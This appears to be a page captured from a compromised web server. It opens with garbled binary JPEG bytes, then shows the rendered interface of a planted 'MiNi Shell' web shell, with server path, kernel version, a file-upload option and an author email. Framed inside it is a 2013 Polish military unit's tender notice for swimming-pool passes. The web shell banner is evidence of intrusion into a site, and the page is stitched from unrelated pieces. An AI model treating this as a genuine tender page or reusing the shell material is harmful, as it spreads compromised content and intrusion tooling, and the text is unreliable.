JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/25635-N-2013.html

<p class="kh_header"><b>Rzeszów: Zakup karnetów na basen</b><br>
<b>Numer ogłoszenia: 25635 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4784 , ul. Krakowska 11B, 35-111 Rzeszów, woj. podkarpackie, tel. 17 715 56 59, faks 17 715 63 85.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://przetargi.army.mil.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup karnetów na basen.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup karnetów na basen. zamawiający dopuszcza składanie ofert częściowych gdzie część (zadanie) stanowi: Zadanie częściowe nr 1;  Zadanie częściowe nr 2; Zadanie częściowe nr 3; Zadanie częściowe nr 4;  Zadanie częściowe nr 5; Zadanie częściowe nr 6; Zadanie częściowe nr 7; Zadanie częściowe nr 8 (wynajęcie całego basenu)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7, 92.61.00.00-0, 92.62.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.army.mil.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2013 godzina 11:30, miejsce: w siedzibie Zamawiającego pokój nr 1 Kancelaria Jawna  Jednostki Wojskowej 4784 w Rzeszowie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 1 (RZESZÓW).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
 	34 WOG  Rzeszów	- 20 karnetów (1 osoba/karnet);
 	21 bdow Rzeszów	- 30 karnetów (20 osób/karnet);
 	21 blog Rzeszów	- 8 karnetów (20 osób/karnet);
 	1 bsp Rzeszów	- 10 karnetów (20 osób/karnet);
 	21 BSP Rzeszów	- 7 karnetów (20 osób/karnet);
 	WSzW Rzeszów	- 15 karnetów (1 osoba/karnet)
 	WKT d/Rzeszów	- 2 karnety (1 osoba/karnet)
Termin i czas korzystania z basenu:
 	34 WOG Rzeszów	- dwa  razy w miesiącu po jednej godzinie - dostępność codziennie między godzinami 08:00 - 21:00, ilość wejść na jeden karnet  - 20. 
 	21 bdow Rzeszów 	- dwie środy w miesiącu po dwie godziny - dostępność codziennie między godzinami 08:00 - 21:00;
 	21 blog Rzeszów 	- raz w miesiącu (piątek) w godzinach od 12:30 do 13:15;
 	1 bsp Rzeszów 	- dwa razy w miesiącu (poniedziałek lub środa) w godzinach od 07:00 do 07:45;
 	21 BSP Rzeszów 	- ostatni czwartek miesiąca w godzinach od 07:30 do 09:00;
 	WSzW Rzeszów 	- dwa razy w miesiącu po jednej godzinie - dostępność codziennie między godzinami 16:00 - 20:00, ilość wejść na 1 karnet 17;
 	WKT deleg. Rzeszów -  pierwsza i ostatnia środa miesiąca w godzinach od 14:00 do 14:45 oraz każdy piątek w godzinach 08:00 do 08:45, ilość wejść na 1 karnet - 50.
  
Lokalizacja basenu:	Rzeszów  lub okolice (w odległości  15 km  od  centrum miasta).
Termin realizacji:		od  podpisania umowy do 30.12.2013 roku. 
Jedna godzina basenowa to  60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 2 (Nisko, Stalowa Wola).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:  

3 binż Nisko 	-  2 karnety typu VIP (30/osób/karnet)
		-  jeden karnet doładowanie, drugi zakup;
		-  4 karnety typu AQUAMAX (zakup)
6 RPW Stalowa Wola 	- 4 karnety (1 osoba /karnet) typu AQUAMAX

Termin i czas korzystania z basenu:
 3 binż Nisko: dwa razy w tygodniu po jednej godzinie (dni oraz godziny do uzgodnienia z przedstawicielem jednostki);
 6 RPW Stalowa Wola: raz w tygodniu po jednej godzinie (dni oraz godziny do uzgodnienia z przedstawicielem jednostki). 

Lokalizacja basenu:	Stalowa Wola
Termin realizacji:	od podpisania umowy  do 30.12.2013 r,
Jedna godzina basenowa to 45 minut - czas liczony  od momentu wejścia do wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 3   (ŻURAWICA I PRZEMYŚL).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
 	1 bcz Żurawica	- 246 karnetów (12 osób/karnet);
			- 2 karnety (1 osoba/karnet - ilość wejść na karnet - 20;
 	5 bsp Przemyśl	- 44 karnety (12 osób/karnet)
Termin i czas korzystania z basenu:
 	1 bcz Żurawica: cztery razy w tygodniu po jednej godzinie (dni  oraz godziny do uzgodnienia  z przedstawicielem jednostki);
 	5 bsp Przemyśl: dwa razy w tygodniu po jednej godzinie (dni oraz godziny do uzgodnienia z przedstawicielem jednostki).
Lokalizacja basenu:	Przemyśl
Termin realizacji:		od  podpisania umowy  do 30.12.2013 rok. 
Jedna godzina basenowa to 45 minut - czas liczony od momentu wejścia do wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.60.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 4     (Jasło).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
WKU Jasło   - 6 karnetów (1 osoba/karnet) - 20  wejść na jednym karnecie 

Termin i czas korzystania z basenu:
WKU Jasło: raz w tygodniu (poniedziałek lub czwartek) po jednej godzinie - dostepność między godzinami 13:20 - 15:00
Terminy:
4, 14, 21, 28 marca
8,18, 29 kwietnia
28 października
7, 18, 25 listopada
2, 9, 12, 16, 19, 30 grudnia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.61.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 5     (Sanok).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WKU Sanok - 3 karnety (1 osoba/karnet) - 15 wejśc na jednym karnecie
Termin  i czas  korzystania z basenu:
WKU Sanok: w każdy czwartek miesiąca po jednej godzinie 14:40 - 15:25
Lokalizacja basenu:   Sanok,
Termin:   od podpisania umowy  do 30.12.2013 r. 
Karnety/bilety:  dostosowanie do danej jednostki 
Jedna godzina basenowa to 45 minut - czas liczony od momentu wejscia do wody..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 6    (Jarosław).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
WKU Jaroslaw     - 6 karnetów małych;
14 das Jarosław  - 19 karnetów dużych;
21 daplot Jarosław  - 3 karnety średnie.

Termin i czas korzystania z basenu:
WKU Jarosław:  dwa razy w tygodniu po jednej godzinie (dni oraz godziny do uzgodnienia z przedstawicielem jednostki);
14 das Jarosław:  jeden raz w miesiącu po jednej godzinie - dostepność codziennie między godzinami 13:00 - 15:00
21 daplot Jarosław:    wtorek w godzinach od 14:00 do 15:00 
Lokalizacja basenu:
Miejsce:  - Jarosław 
Termin:     od podpisania umowy  do 30.12.2013 r.
Karnety/bilety: dostosowane do danej jednostki

Jedna godzina basenowa to 60 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 7   (Wysoka Głogowska).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
Jednostka Wojskowa Wysoka Głogowska  - 20 karnetów (15 osób/karnet)
4 karnety duże,
16 karnetów średnich.
Termin i czas korzystania z basenu:
JW Wysoka Głogowska : w każdy wtorek 13:30 do 15:30 (za wyjątkiem czerwca i października).

Lokalizacja basenu:
Miejsce:     Głogów Małopolski;
Termin:       od podpisania umowy  do 30.12.2013 r.
Karnety/bilety:    dostosowane do danej jednostki

Jedna  godzina basenowa to 60 minut ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE CZĘŚCIOWE NR 8   (Rzeszów).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup karnetów dla żołnierzy zawodowych  z  jednostek:
kompania rozpoznawcza z 21 bdow Rzeszów (cały basen  15 poniedziałków i 15 piątków -  do 72 osób).

Głębokość - min. 3,70 m. urzadzenia  umożliwiające  skoki do wody z wysokości minimum 4 m., mozliwość używania pontonów 6-osobowych, pływania w umundurowaniu i wykorzystania sprzętu alipinistycznego do treningów zjazdu do wody z wysokości minimum 5 m. , szatnia z zamykanymi szafkami oraz natryski, czas wykorzystania basenu liczony od momentu wejścia do wody, dyslokacja obiektu - rejon miasta Rzeszów.
Termin i czas korzystania z basenu:
kompania rozpoznawcza: każdy poniedziałek i piatek od 10:30 do 12:00
Lokalizacja basenu;
Miejsce:   rejon m. Rzeszowa ,
Karnety / bilety:   dostosowane do danej jednostki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com